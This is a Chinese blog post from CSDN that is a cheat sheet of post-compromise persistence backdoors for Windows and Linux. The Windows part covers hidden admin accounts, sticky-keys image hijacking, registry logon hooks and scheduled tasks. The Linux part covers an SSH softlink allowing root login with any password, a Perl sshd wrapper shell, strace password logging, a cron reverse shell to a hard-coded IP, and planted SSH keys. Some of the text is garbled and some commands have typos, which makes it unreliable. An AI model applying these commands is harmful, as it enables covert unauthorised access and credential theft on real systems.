权限维持小结

最新推荐文章于 2024-07-16 21:08:41 发布
最新推荐文章于 2024-07-16 21:08:41 发布
阅读量583 收藏
点赞数
文章标签: php 服务器 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/121480013
版权

权限维持小结
windows
添加影子账户
net user tianxia$ tianxia /add(计算机管理》用户管理,看得到,net user看不到)
net localgroup administrators tianxia$ /add(添加到管理员组)
打开注册表管理器
regedit打开注册表,在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names中会出现tianxia , 将 t i a n x i a ,将tianxia tianxia导出,并且在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users中将tianxia , A d m i n i s t r a t o r s 对 应 的 账 户 也 导 出 , 使 用 记 事 本 等 工 具 , 将 A d m i n i s t r a t o r s 对 应 的 账 户 中 F 的 值 复 制 到 t i a n x i a ,Administrators对应的账户也导出,使用记事本等工具,将Administrators对应的账户中F的值复制到tianxia Administrators使AdministratorsFtianxia对应的账户F的值,

删除影子账户
net user tianxia$ tianxia /del
使用 regedit /s 1.reg(tianxia$导出之后的文件)
检测方法
在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下查看Administrators对应的默认值,检测其他账户,默认值相同,则为影子账户,删除即可
参考链接
https://blog.csdn.net/baidu_38844729/article/details/115708745
https://blog.csdn.net/r13929847477/article/details/52412677

映像劫持(简单的说:你打开的是a,实际上运行的是b)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options路径
查找对应的exe文件添加debugger,并且修改属性值为想要运行的文件(以cmd为例,键值更改为cmd.exe,更改之后,打开对应exe,即可打开cmd窗口)
使用gflags.exe,可以在关闭运行文件后打开cmd窗口(https://github.com/gflags/gflags)
主要用法,更改粘滞键(5下shift)关闭之后,运行powelshell,或者运行自己的木马程序
参考:https://cloud.tencent.com/developer/article/1672119

userinit注册表后门(根据程序的运行顺序)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon(路径)
使用,添加userinit的值,执行命令(使用cs建立对应powershell脚本)或者执行文件。(需要后门文件的绝对路径)
logoff(重启计算机)

计划任务(需要system权限)
schtasks.exe /create /tn upadte /tr whomi(需要执行的命令或者程序) /sc minute /mo 1/f /rl highest(空格需要\转义)
含义,每一分钟都执行一次whomi
贴链接:https://www.cnblogs.com/xiaozi/p/11797078.html

msf中的persistence模块
run persistence -p payload -p 端口 -r 监听地址 -u -i
-u 自启动
-i 执行建个时间,单位为秒

linux权限维持
ssh软连接
利用前提
ssh配置中开启了PAM进行身份验证
查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM
注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find/etc/pam.d|xargs grep “pam_rootok”,出现的则可以用作软链接名称
使用root执行命令
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=1234
然后使用ssh任意密码连接1234端口登录root账户

ssh wrapper
服务端:
cd /usr/sbin/
mv sshd …/bin/
echo ‘#!/usr/bin/perl’ >sshd
echo ‘exec “/bin/sh” if(getpeername(STDIN) =~ /^…4A/);’ >>sshd
echo ‘exec{"/usr/bin/sshd"} “/usr/sbin/sshd”,@ARGV,’ >>sshd
chmod u+x sshd
/etc/init.d/sshd restart
客户端:
socat STDIO TCP4:target_ip:22,sourceport=13377
即可使用各种命令

strace后门
通过命令替换动态跟踪系统调用和数据,可以用来记录用户ssh、su、sudo的操作。
#vim /etc/bashrc
alias ssh=‘strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh’

source /root/.bashrc

计时任务提权
创建shell脚本,例如在/etc/evil.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.28.131/12345 0>&1
chmod +sx /etc/evil.sh
service crond restart(重启服务)
crontab -e 设置定时任务
每一分钟执行一次
crontab -e 1 * * * * /root/etc/evil.sh
五个*依次为分钟,小时,几号,月份,星期几

ssh私钥登录
ssh-keygent -t rsa
回车后会生成
id_rsa(私钥) id_rsa.pub(公钥)
公钥上传到目标主机中
重命名为authorized_keys上传到.ssh目录下
chmod 600 id_rsa 更改权限,登录
参考:https://www.cnblogs.com/-mo-/p/12337766.html

天下是个小趴菜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-Linux权限维持
lza20001103的博客
09-26 2360
Linux权限维持 文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记 前言 前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。 ssh后门 过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 (1)ssh后门(脚本内容)(192.168.231.134) #!
权限维持技术探索】
qq_55213436的博客
01-17 1004
定义攻击者尝试维持驻点的技术,包括攻击者用来在重启、修改凭据或则其他能够切断攻击者访问的情况下,依然保持对系统的访问,具体技术包括一些访问某些页面、执行某些操作或者修改配置使得能够在系统上长久的驻留。后门的功能常见的后门往往有一些功能以达到一些目的,如:写入后门文件、会连CC、进行密码记录和挖矿等功能。权限维持常常具有:定期出发、重启出发、以及常见的事件调用唤起后门等特点。攻击者常常通过文件隐藏、进程隐藏、网络隐藏、守护进程、系统权限启动等操作达到如下目的。后门分类。
修改注册表键值UserInitMprLogonScript达到权限维持
热门推荐
Shanfenglan's blog
11-11 10万+
CATALOG前言实现 前言 注册表HKCR\Environment\UserInitMprLogonScript键值所指的程序会在杀毒软件启动前启动,而且修改它不需要管理员权限,因此我们可以通过其来达到权限维持的效果。 实现 bat文件内容为regsvr32 calc.dll,直接执行发现被360拦截。 这时候我们通过修改注册表的方式来绕过这个拦截让其在360启动前执行。 在powershell中输入,注意修改路径: New-ItemProperty "HKCU:\Environment\" UserI
通过SSH留后门(创建ssh软链接)
songling515010475的专栏
05-10 2210
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
【内网安全】——Linux权限维持
Demo不是emo的博客
02-26 4470
Linux常见的权限维持姿势
MySQL存储过程的权限问题小结
12-16
MySQL存储过程的权限问题涉及到数据库管理系统中的访问控制和安全策略。在MySQL中,存储过程是一种预编译的SQL代码集合,允许开发者封装复杂的业务逻辑,提高数据库操作的效率和安全性。然而,不当的权限配置可能...
linux权限维持.pdf
03-31
linux权限维持.pdf
Win2003服务器系统文件权限设置小结
01-10
不多说了,下面将说明需要设置权限的系统文件,设置为只有Administrators组可以访问,并且拒绝Guests组访问。  “%SystemDrive%/boot.ini” Windows主要依赖Boot.ini文件来确定计算机在重启(引导)过程中显示的可...
Android6.0动态申请权限所遇到的问题小结
01-05
下面的权限组是由谷歌官方定义的,目的是在申请权限时,只要用户允许同一权限组的任意一条权限,那么该组的其他权限也就默认是允许的。不过据高人介绍,在使用时最好是用到哪个权限就具体的请求该权限,因为保不齐哪...
IIS6.0的默认权限和用户权限设置小结
01-10
NTFS 权限 目录 用户\组 权限 %windir%\help\iishelp\common Administrators 完全控制 %windir%\help\iishelp\common System 完全控制 %windir%\help\iishelp\common IIS_WPG 读取、执行 %windir%\help\iishelp\...
内网渗透测试:域内权限维持思路总结
qq_45521281的博客
02-21 1701
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows 操作系统常见持久性后门Windows系统隐藏账户Shift 粘滞键后门(1)手动制作(2)Empire 下的利用注册表键后门(1)手动制作(2)Metasploit 下的利用(3)Empire 下的利用Windows 计划任务后门(1)利用 at 命令(2)利用 schtasks 命令(3)利用SharPersist工.
kali修改文件权限不够_Linux下的权限维持
weixin_39956036的博客
10-21 1979
Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根...
linux-wrapper跟inetd服务后门
渗透测试教程
03-10 544
通过本文,你将会学习如下6个linux痕迹隐藏技巧,祝师傅牛气冲天! 隐藏远程SSH登陆记录 清除当前的history记录 隐藏Vim的操作记录 隐藏文件修改时间 锁定文件 清除系统日志痕迹 隐藏远程SSH登陆记录 隐身登录系统,不会被w、last等指令检测到。 ssh -T root@192.0.0.1 /bin/bash -i -T表示不分配伪终端,/usr/bin/bash 表示在登录后调用bash命令 -i 表示是交互式shell 原理 w/last命令日志/var/log/wtmp 是utmp
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 607
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 428
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
释放Laravel Blade的威力:掌握Laravel的模板引擎
最新发布
2401_85812026的博客
07-16 1014
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
NSSCTF中24网安培训day1中web的题目
2302_78903258的博客
07-14 1047
我又试了大小写,双写,特殊后缀名绕过的方法,发现均不能绕过,我们用.htaccess文件进行绕过,先上传一个.htaccess文件,文件内容<FilesMatch ¡°.jpg¡±>SetHandler application/x-httpd-php</FilesMatch> //这是把php文件都当作jpg的图片格式。,也就是说它执行了下面这句,那么我们还需要传flag参数。giveme=flag&flag=giveme,输入后,发现如下直接返回了flag,也就是说,代码退出了并输出了flag。
【pbootcms】新环境搭建环境安装时发生错误
艾塔SEO
07-11 213
至此测试成功,可以正常访问后台。新环境安装后台,第一时间替换授权代码,再进行其他操作。2、数据库信息是否替换(根目录下/config/database.php 文件)3、重新删除runtime目录(runtime文件夹为缓存文件夹)1、试着删除根目录下runtime目录,刷新页面重试。3、检查服务器环境pathinfo及伪静态规则配置;【pbootcms】新环境搭建环境安装时发生错误。2、检查系统会话文件存储目录是否具有写入权限;
“一千零一种”权限维持方法.pdf
02-05
"“一千零一种”权限维持方法.pdf - 关注Windows权限维持,包括理解、常用方法和安全相关的知识点" 本文档主要讲述了在网络安全领域如何维持对目标系统的长期控制,特别是针对Windows操作系统的权限维持技术。权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值